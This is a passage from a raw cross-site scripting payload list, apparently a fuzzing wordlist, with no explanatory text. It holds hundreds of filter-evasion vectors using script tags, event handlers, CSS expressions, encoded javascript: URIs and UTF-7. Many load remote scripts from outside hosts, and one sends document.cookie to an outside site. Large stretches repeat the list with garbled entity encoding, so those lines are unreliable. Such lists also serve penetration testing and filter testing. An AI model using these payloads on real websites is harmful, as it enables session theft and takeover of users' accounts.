SRC=javascript:alert(&apos;XSS&apos;)&gt; +&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt; +Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser +exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&quot;); +&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS +&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt; +&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt; +&lt;IMG SRC=&quot;livescript:[code]&quot;&gt; +%BCscript%BEalert(%A2XSS%A2)%BC/script%BE +&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt; +&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;mocha:[code]&quot;&gt; +&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt; +&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt; +&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt; +a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d); +&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt; +&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt; +&lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt; +&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; +&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt; +&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt; +&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt; +&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt; +&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt; +&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt; +&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt; +&lt;HTML xmlns:xss&gt; +&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt; +&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt; +&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt; +&lt;HTML&gt;&lt;BODY&gt; +&lt;!--[if gte IE 4]&gt; +&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt; +&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt; +&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt; +&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt; +&lt;? echo(&apos;&lt;SCR)&apos;; +&lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt; +&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt; +&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt; +&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt; +&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt; +&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt; +&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt; +&lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt; +&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt; +&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4- +\&quot;;alert(&apos;XSS&apos;);// +&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt; +&lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt; +&lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D; +perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out +perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out +&lt;IMG SRC=&quot; &amp;#14; javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt; +&lt;SCRIPT SRC=http://ha.ckers.org/xss.js +&lt;SCRIPT SRC=//ha.ckers.org/.j&gt; +&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot; +&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt; +&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt; +&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt; +&lt;SCRIPT&gt;a=/XSS/ +&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt; +<script>document.vulnerable=true;</script> +<img SRC="jav ascript:document.vulnerable=true;"> +<img SRC="javascript:document.vulnerable=true;"> +<img SRC=" &#14; javascript:document.vulnerable=true;"> +<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> +<<SCRIPT>document.vulnerable=true;//<</SCRIPT> +<script <B>document.vulnerable=true;</script> +<img SRC="javascript:document.vulnerable=true;" +<iframe src="javascript:document.vulnerable=true; < +<script>a=/XSS/\ndocument.vulnerable=true;</script> +\";document.vulnerable=true;;// +</title><SCRIPT>document.vulnerable=true;</script> +<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> +<body BACKGROUND="javascript:document.vulnerable=true;"> +<body ONLOAD=document.vulnerable=true;> +<img DYNSRC="javascript:document.vulnerable=true;"> +<img LOWSRC="javascript:document.vulnerable=true;"> +<bgsound SRC="javascript:document.vulnerable=true;"> +<br SIZE="&{document.vulnerable=true}"> +<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> +<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> +<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS +<img SRC='vbscript:document.vulnerable=true;'> +1script3document.vulnerable=true;1/script3 +<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> +<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> +<IFRAME SRC="javascript:document.vulnerable=true;"></iframe> +<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> +<table BACKGROUND="javascript:document.vulnerable=true;"> +<table><TD BACKGROUND="javascript:document.vulnerable=true;"> +<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> +<div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)"> +<div STYLE="width: expression(document.vulnerable=true);"> +<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> +<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> +<XSS STYLE="xss:expression(document.vulnerable=true)"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> +<style TYPE="text/javascript">document.vulnerable=true;</style> +<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> +<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> +<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> +<base HREF="javascript:document.vulnerable=true;//"> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> +<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> +<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> +<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> +<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> +<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> +<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- +<a href="javascript#document.vulnerable=true;"> +<div onmouseover="document.vulnerable=true;"> +<img src="javascript:document.vulnerable=true;"> +<img dynsrc="javascript:document.vulnerable=true;"> +<input type="image" dynsrc="javascript:document.vulnerable=true;"> +<bgsound src="javascript:document.vulnerable=true;"> +&<script>document.vulnerable=true;</script> +&{document.vulnerable=true;}; +<img src=&{document.vulnerable=true;};> +<link rel="stylesheet" href="javascript:document.vulnerable=true;"> +<iframe src="vbscript:document.vulnerable=true;"> +<img src="mocha:document.vulnerable=true;"> +<img src="livescript:document.vulnerable=true;"> +<a href="about:<script>document.vulnerable=true;</script>"> +<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> +<body onload="document.vulnerable=true;"> +<div style="background-image: url(javascript:document.vulnerable=true;);"> +<div style="behaviour: url([link to code]);"> +<div style="binding: url([link to code]);"> +<div style="width: expression(document.vulnerable=true;);"> +<style type="text/javascript">document.vulnerable=true;</style> +<object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> +<style><!--</style><script>document.vulnerable=true;//--></script> +<<script>document.vulnerable=true;</script> +<![<!--]]<script>document.vulnerable=true;//--></script> +<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> +<img src="blah"onmouseover="document.vulnerable=true;"> +<img src="blah>" onmouseover="document.vulnerable=true;"> +<xml src="javascript:document.vulnerable=true;"> +<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> +<div datafld="b" dataformatas="html" datasrc="#X"></div> +[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> +<style>@import'http://www.securitycompass.com/xss.css';</style> +<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> +<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> +<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> +<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> +<script SRC="http://www.securitycompass.com/xss.jpg"></script> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> +<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> +<script =">" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> +<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> +<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> +<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] +&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt; +&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt; +&lt;/br style=a:expression(alert())&gt; +&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt; +&lt;br size=\&quot;&amp;{alert(&#039;XSS&#039;)}\&quot;&gt; +perl -e &#039;print \&quot;&lt;IMG SRC=java\0script:alert(\&quot;XSS\&quot;)&gt;\&quot;;&#039; &gt; out +perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCR\0IPT&gt;\&quot;;&#039; &gt; out +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS STYLE=xss:expression(alert('XSS'))> +"><script>alert('XSS')</script> +</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS STYLE=xss:e/**/xpression(alert('XSS'))> +</XSS STYLE=xss:expression(alert('XSS'))> +';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; +';';;!--";<;XSS>;=&;{()} +<;SCRIPT>;alert(';XSS';)<;/SCRIPT>; +<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>; +<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; +<;BASE HREF=";javascript:alert(';XSS';);//";>; +<;BGSOUND SRC=";javascript:alert(';XSS';);";>; +<;BODY BACKGROUND=";javascript:alert(';XSS';);";>; +<;BODY ONLOAD=alert(';XSS';)>; +<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>; +<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>; +<;DIV STYLE=";width: expression(alert(';XSS';));";>; +<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>; +<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>; +<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>; +<;IMG SRC=";javascript:alert(';XSS';);";>; +<;IMG SRC=javascript:alert(';XSS';)>; +<;IMG DYNSRC=";javascript:alert(';XSS';);";>; +<;IMG LOWSRC=";javascript:alert(';XSS';);";>; +<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>; +Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser +exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); +<;STYLE>;li {list-style-image: url(";javascript:alert(&#39;XSS&#39;)";);}<;/STYLE>;<;UL>;<;LI>;XSS +<;IMG SRC=';vbscript:msgbox(";XSS";)';>; +<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>; +<;IMG SRC=";livescript:[code]";>; +%BCscript%BEalert(%A2XSS%A2)%BC/script%BE +<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>; +<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>; +<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>; +<;IMG SRC=";mocha:[code]";>; +<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>; +<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>; +<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>; +a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;&#10;eval(a+b+c+d); +<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>; +<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>; +<;XSS STYLE=";xss:expression(alert(';XSS';))";>; +<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>; +<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>; +<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>; +<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>; +<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>; +<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>; +<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>; +<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>; +<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>; +<;HTML xmlns:xss>; +<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>; +<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>; +<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>; +<;HTML>;<;BODY>; +<;!--[if gte IE 4]>; +<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>; +<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>; +<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>; +<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->; +<;? echo(';<;SCR)';; +<;BR SIZE=";&;{alert(';XSS';)}";>; +<;IMG SRC=JaVaScRiPt:alert(';XSS';)>; +<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>; +<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>; +<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; +<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>; +<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>; +<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>; +<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>; +<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4- +\";;alert(';XSS';);// +<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>; +<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>; +<;IMG SRC=";jav&#x09;ascript:alert(';XSS';);";>; +<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>; +<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>; +<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>; +<;IMG&#x0D;SRC&#x0D;=&#x0D;";&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;';&#x0D;X&#x0D;S&#x0D;S&#x0D;';&#x0D;)&#x0D;";&#x0D;>;&#x0D; +perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out +perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out +<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>; +<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; +<;SCRIPT SRC=http://ha.ckers.org/xss.js +<;SCRIPT SRC=//ha.ckers.org/.j>; +<;IMG SRC=";javascript:alert(';XSS';)"; +<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; +<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>; +<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>; +<;SCRIPT>;a=/XSS/ +<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;A HREF=";http://66.102.7.147/";>;XSS<;/A>; +<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>; +<;A HREF=";http://1113982867/";>;XSS<;/A>; +<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>; +<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>; +<;A HREF=";h&#x0A;tt&#09;p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>; +<;A HREF=";//www.google.com/";>;XSS<;/A>; +<;A HREF=";//google";>;XSS<;/A>; +<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>; +<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>; +<;A HREF=";http://google.com/";>;XSS<;/A>; +<;A HREF=";http://www.google.com./";>;XSS<;/A>; +<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>; +<;A 